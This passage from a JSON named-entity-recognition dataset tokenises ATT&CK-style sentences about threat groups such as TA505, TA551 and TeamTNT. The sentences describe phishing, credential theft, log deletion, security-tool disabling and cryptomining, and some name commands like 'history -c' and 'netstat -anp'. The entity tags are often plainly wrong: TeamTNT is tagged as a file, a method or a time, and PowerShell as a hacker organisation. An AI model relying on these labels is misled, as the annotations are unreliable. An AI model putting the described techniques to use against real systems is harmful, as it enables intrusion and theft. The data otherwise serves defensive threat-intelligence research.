"B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "TA2541", "has", "used", "spearphishing", "e-mails", "with", "malicious", "links", "to", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "collected", "system", "information", "prior", "to", "downloading", "malware", "on", "the", "targeted", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "commodity", "remote", "access", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O" ] }, { "tokens": [ "TA2541", "has", "uploaded", "malware", "to", "various", "platforms", "including", "Google", "Drive,", "Pastetext,", "Sharetext,", "and", "GitHub." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "used", "VBS", "files", "to", "execute", "or", "establish", "persistence", "for", "additional", "payloads,", "often", "using", "file", "names", "consistent", "with", "email", "themes", "or", "mimicking", "system", "functionality." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA2541", "has", "hosted", "malicious", "files", "on", "various", "platforms", "including", "Google", "Drive,", "OneDrive,", "Discord,", "PasteText,", "ShareText,", "and", "GitHub." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "TA2541", "has", "used", "WMI", "to", "query", "targeted", "systems", "for", "security", "products." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA459", "has", "exploited", "Microsoft", "Word", "vulnerability", "CVE-2017-0199", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "I-Exp", "I-Exp", "I-Exp", "B-Features", "O", "O" ] }, { "tokens": [ "TA459", "has", "attempted", "to", "get", "victims", "to", "open", "malicious", "Microsoft", "Word", "attachment", "sent", "via", "spearphishing." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "I-SamFile", "O", "O", "B-Way" ] }, { "tokens": [ "TA459", "has", "used", "PowerShell", "for", "execution", "of", "a", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA459", "has", "targeted", "victims", "using", "spearphishing", "emails", "with", "malicious", "Microsoft", "Word", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "I-SamFile", "I-SamFile", "B-SecTeam" ] }, { "tokens": [ "TA459", "has", "a", "VBScript", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "signed", "payloads", "with", "code", "signing", "certificates", "from", "Thawte", "and", "Sectigo." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "base64", "encoded", "PowerShell", "commands." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TA505", "has", "used", "malware", "to", "gather", "credentials", "from", "FTP", "clients", "and", "Outlook." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "malware", "to", "gather", "credentials", "from", "Internet", "Explorer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "a", "wide", "variety", "of", "ransomware,", "such", "as", "Clop,", "Locky,", "Jaff,", "Bart,", "Philadelphia,", "and", "GlobeImposter,", "to", "encrypt", "victim", "files", "and", "demand", "a", "ransom", "payment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Tool", "B-Tool", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "decrypted", "packed", "DLLs", "with", "an", "XOR", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "malware", "to", "disable", "Windows", "Defender." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "stolen", "domain", "admin", "accounts", "to", "compromise", "additional", "hosts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "registered", "domains", "to", "impersonate", "services", "such", "as", "Dropbox", "to", "distribute", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "leveraged", "malicious", "Word", "documents", "that", "abused", "DDE." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "been", "seen", "injecting", "a", "DLL", "into", "winword.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Org", "B-OffAct", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "TA505", "has", "used", "the", "tool", "EmailStealer", "to", "steal", "and", "send", "lists", "of", "e-mail", "addresses", "to", "a", "remote", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "password-protected", "malicious", "Word", "documents." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "TA505", "has", "used", "fast", "flux", "to", "mask", "botnets", "by", "distributing", "payloads", "across", "multiple", "IPs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "downloaded", "additional", "malware", "to", "execute", "on", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "JavaScript", "for", "code", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "lures", "to", "get", "users", "to", "enable", "content", "in", "malicious", "attachments", "and", "execute", "malicious", "files", "contained", "in", "archives.", "For", "example,", "TA505", "makes", "their", "malware", "look", "like", "legitimate", "Microsoft", "Word", "documents,", ".pdf", "and/or", ".lnk", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "TA505", "has", "used", "lures", "to", "get", "users", "to", "click", "links", "in", "emails", "and", "attachments.", "For", "example,", "TA505", "makes", "their", "malware", "look", "like", "legitimate", "Microsoft", "Word", "documents,", ".pdf", "and/or", ".lnk", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "O", "B-SamFile", "O", "B-SamFile", "O" ] }, { "tokens": [ "TA505", "has", "used", "malware", "such", "as", "Azorult", "and", "Cobalt", "Strike", "in", "their", "operations." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", ".iso", "files", "to", "deploy", "malicious", ".lnk", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "TA505", "has", "used", "malware", "to", "disable", "Windows", "Defender", "through", "modification", "of", "the", "Registry." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "<code>msiexec</code>", "to", "download", "and", "execute", "malicious", "Windows", "Installer", "files." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "deployed", "payloads", "that", "use", "Windows", "API", "calls", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "TinyMet", "to", "enumerate", "members", "of", "privileged", "groups.", "TA505", "has", "also", "run", "<code>net", "group", "/domain</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "PowerShell", "to", "download", "and", "execute", "malware", "and", "reconnaissance", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "leveraged", "<code>rundll32.exe</code>", "to", "execute", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "UPX", "to", "obscure", "malicious", "code." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "spearphishing", "emails", "with", "malicious", "attachments", "to", "initially", "compromise", "victims." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "sent", "spearphishing", "emails", "containing", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "a", "variety", "of", "tools", "in", "their", "operations,", "including", "AdFind,", "BloodHound,", "Mimikatz,", "and", "PowerSploit." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "TA505", "has", "staged", "malware", "on", "actor-controlled", "domains." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "VBS", "for", "code", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "used", "HTTP", "to", "communicate", "with", "C2", "nodes." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA505", "has", "executed", "commands", "using", "<code>cmd.exe</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "obfuscated", "variable", "names", "in", "a", "JavaScript", "configuration", "file." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "a", "DGA", "to", "generate", "URLs", "from", "executed", "macros." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "spoofed", "company", "emails", "that", "were", "acquired", "from", "email", "clients", "on", "previously", "infected", "hosts", "to", "target", "other", "individuals." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "retrieved", "DLLs", "and", "installer", "binaries", "for", "malware", "execution", "from", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "prompted", "users", "to", "enable", "macros", "within", "spearphishing", "attachments", "to", "install", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "masked", "malware", "DLLs", "as", "dat", "and", "jpg", "files." ], "ner_tags": [ "B-Idus", "O", "I-Way", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "mshta.exe", "to", "execute", "malicious", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "regsvr32.exe", "to", "load", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "rundll32.exe", "to", "load", "malicious", "DLLs." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "sent", "spearphishing", "attachments", "with", "password", "protected", "ZIP", "files." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "encoded", "ASCII", "text", "for", "initial", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "hidden", "encoded", "data", "for", "malware", "DLLs", "in", "a", "PNG." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "TA551", "has", "used", "<code>cmd.exe</code>", "to", "execute", "commands." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "an", "IRC", "bot", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-Org", "O" ] }, { "tokens": [ "TeamTNT", "has", "cleared", "command", "history", "with", "<code>history", "-c</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "removed", "system", "logs", "from", "<code>/var/log/syslog</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "leveraged", "AWS", "CLI", "to", "enumerate", "cloud", "environments", "with", "compromised", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "queried", "the", "AWS", "instance", "metadata", "service", "for", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "executed", "Hildegard", "through", "the", "kubelet", "API", "run", "command", "and", "by", "executing", "commands", "on", "running", "containers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "checked", "for", "running", "containers", "with", "<code>docker", "ps</code>", "and", "for", "specific", "container", "names", "with", "<code>docker", "inspect</code>.", "TeamTNT", "has", "also", "searched", "for", "Kubernetes", "pods", "running", "in", "a", "local", "network." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "unsecured", "AWS", "credentials", "and", "Docker", "API", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "a", "script", "that", "decodes", "a", "Base64-encoded", "version", "of", "WeaveWorks", "Scope." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "deployed", "different", "types", "of", "containers", "into", "victim", "environments", "to", "facilitate", "execution.", "TeamTNT", "has", "also", "transferred", "cryptocurrency", "mining", "software", "to", "Kubernetes", "clusters", "discovered", "within", "local", "IP", "address", "ranges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "disabled", "<code>iptables</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "disabled", "and", "uninstalled", "security", "tools", "such", "as", "Alibaba,", "Tencent,", "and", "BMC", "cloud", "monitoring", "agents", "on", "cloud-based", "infrastructure." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "B-Way", "O", "I-Tool", "I-Tool", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "obtained", "domains", "to", "host", "their", "payloads." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "encrypted", "its", "binaries", "via", "AES", "and", "encoded", "files", "using", "Base64." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TeamTNT", "has", "deployed", "privileged", "containers", "that", "mount", "the", "filesystem", "of", "victim", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "sent", "locally", "staged", "files", "with", "collected", "credentials", "to", "C2", "servers", "using", "cURL." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TeamTNT", "has", "used", "open-source", "tools", "such", "as", "Weave", "Scope", "to", "target", "exposed", "Docker", "API", "ports", "and", "gain", "initial", "access", "to", "victim", "environments.", "TeamTNT", "has", "also", "targeted", "exposed", "kubelets", "for", "Kubernetes", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "a", "payload", "that", "removes", "itself", "after", "running.", "TeamTNT", "also", "has", "deleted", "locally", "staged", "files", "for", "collecting", "credentials", "or", "scan", "results", "for", "local", "IP", "addresses", "after", "exfiltrating", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "a", "script", "that", "checks", "`/proc/*/environ`", "for", "environment", "variables", "related", "to", "AWS." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "the", "<code>curl</code>", "and", "<code>wget</code>", "commands", "as", "well", "as", "batch", "scripts", "to", "download", "new", "tools." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "modified", "the", "permissions", "on", "binaries", "with", "<code>chattr</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "created", "local", "privileged", "users", "on", "victim", "machines." ], "ner_tags": [ "B-Way", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "aggregated", "collected", "credentials", "in", "text", "files", "before", "exfiltrating." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "relied", "on", "users", "to", "download", "and", "execute", "malicious", "Docker", "images." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "B-HackOrg", "O" ] }, { "tokens": [ "TeamTNT", "has", "developed", "custom", "malware", "such", "as", "Hildegard." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TeamTNT", "has", "disguised", "their", "scripts", "with", "docker-related", "file", "names." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "replaced", ".dockerd", "and", ".dockerenv", "with", "their", "own", "scripts", "and", "cryptocurrency", "mining", "software." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "masscan", "to", "search", "for", "open", "Docker", "API", "ports", "and", "Kubernetes", "clusters.", "TeamTNT", "has", "also", "used", "malware", "that", "utilizes", "zmap", "and", "zgrab", "to", "search", "for", "vulnerable", "services", "in", "cloud", "environments." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "B-Purp", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "attached", "VGA", "devices", "using", "lspci." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "TeamTNT", "has", "executed", "PowerShell", "commands", "in", "batch", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-HackOrg", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "unsecured", "SSH", "keys." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "rival", "malware", "and", "removes", "it", "if", "found.", "TeamTNT", "has", "also", "searched", "for", "running", "processes", "containing", "the", "strings", "aliyun", "or", "liyun", "to", "identify", "machines", "running", "Alibaba", "Cloud", "Security", "tools." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "added", "batch", "scripts", "to", "the", "startup", "folder." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "established", "tmate", "sessions", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "deployed", "XMRig", "Docker", "images", "to", "mine", "cryptocurrency.", "TeamTNT", "has", "also", "infected", "Docker", "containers", "and", "Kubernetes", "clusters", "with", "XMRig,", "and", "used", "RainbowMiner", "and", "lolMiner", "for", "mining", "cryptocurrency." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "B-Purp", "B-Time", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way", "O", "B-Way", "O", "O", "B-Purp" ] }, { "tokens": [ "TeamTNT", "has", "used", "rootkits", "such", "as", "the", "open-source", "Diamorphine", "rootkit", "and", "their", "custom", "bots", "to", "hide", "cryptocurrency", "mining", "activities", "on", "the", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "B-OffAct", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "SSH", "to", "connect", "back", "to", "victim", "machines.", "TeamTNT", "has", "also", "used", "SSH", "to", "transfer", "tools", "and", "payloads", "onto", "victim", "hosts", "and", "execute", "them." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "added", "RSA", "keys", "in", "<code>authorized_keys</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "scanned", "specific", "lists", "of", "target", "IP", "addresses." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "security", "products", "on", "infected", "machines." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "UPX", "and", "Ezuri", "packer", "to", "pack", "its", "binaries." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "system", "version,", "architecture,", "disk", "partition,", "logical", "volume,", "and", "hostname", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "enumerated", "the", "host", "machine’s", "IP", "address." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "run", "<code>netstat", "-anp</code>", "to", "search", "for", "rival", "malware", "connections.", "TeamTNT", "has", "also", "used", "`libprocesshider`", "to", "modify", "<code>/etc/ld.so.preload</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "searched", "for", "services", "such", "as", "Alibaba", "Cloud", "Security's", "aliyun", "service", "and", "BMC", "Helix", "Cloud", "Security's", "bmc-agent", "service", "in", "order", "to", "disable", "them." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "I-SecTeam", "I-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "created", "system", "services", "to", "execute", "cryptocurrency", "mining", "software." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "established", "persistence", "through", "the", "creation", "of", "a", "cryptocurrency", "mining", "system", "service", "using", "<code>systemctl</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "shell", "scripts", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "uploaded", "backdoored", "Docker", "images", "to", "Docker", "Hub." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Tool" ] }, { "tokens": [ "TeamTNT", "has", "scanned", "for", "vulnerabilities", "in", "IoT", "devices", "and", "other", "related", "resources", "such", "as", "the", "Docker", "API." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "TeamTNT", "has", "the", "`curl`", "command", "to", "send", "credentials", "over", "HTTP", "and", "the", "`curl`", "and", "`wget`", "commands", "to", "download", "new", "software.", "TeamTNT", "has", "also", "used", "a", "custom", "user", "agent", "HTTP", "header", "in", "shell", "scripts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "leveraged", "iplogger.org", "to", "send", "collected", "data", "back", "to", "C2." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TeamTNT", "has", "used", "batch", "scripts", "to", "download", "tools", "and", "executing", "cryptocurrency", "miners." ], "ner_tags": [ "B-Idus", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-Org" ] }, { "tokens": [ "TeamTNT", "has", "used", "malware", "that", "adds", "cryptocurrency", "miners", "as", "a", "service." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "The", "White", "Company", "has", "taken", "advantage", "of", "a", "known", "vulnerability", "in", "Microsoft", "Word", "(CVE", "2012-0158)", "to", "execute", "code." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "B-Features", "B-Features", "O", "O", "O" ] }, { "tokens": [ "The", "White", "Company", "has", "the", "ability", "to", "delete", "its", "malware", "entirely", "from", "the", "target", "system." ], "ner_tags": 